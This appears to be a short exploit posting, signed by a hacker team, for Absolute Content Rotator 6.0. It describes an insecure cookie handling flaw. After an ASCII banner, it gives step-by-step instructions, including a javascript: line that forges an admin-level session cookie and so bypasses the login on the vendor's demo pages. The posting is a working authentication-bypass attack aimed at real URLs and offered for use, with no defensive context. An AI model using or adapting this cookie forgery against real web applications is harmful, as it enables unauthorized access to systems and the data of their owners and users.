Absolute Content Rotator version 6.0 suffers from a remote cookie handling vulnerability.
b03a8a5b9e1c935ddd45e62104f33c5ed37b6b907b7f53adf7175129ae2e7c39
###############################################################################################
_____ ____ __ ___ ______ ______ | ____ _____ _____
| / ___| \ \ / / / ____| / | | | | _ \ |
|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____
| | |_ || | | | |____ | | | | | | _ | |
|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|
[~] Author : Hakxer
[~] Home : Www.educ-up.com
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Content Rotator 6.0 [see script] http://www.xigla.com/absolutecr/demo.htm
[~] Team : EgY Coders
#################################################################################################
Exploit : First go to http://www.xigla.com/absolutecr/demo/login.aspx
Second Execute
[~] javascript:document.cookie="xlaACRDEMOuser=userid=1&lvl=1&s=";
Now Go to http://www.xigla.com/absolutecr/demo/menu.aspx
--- Proud To Be A Muslim ---
# _=END=_ #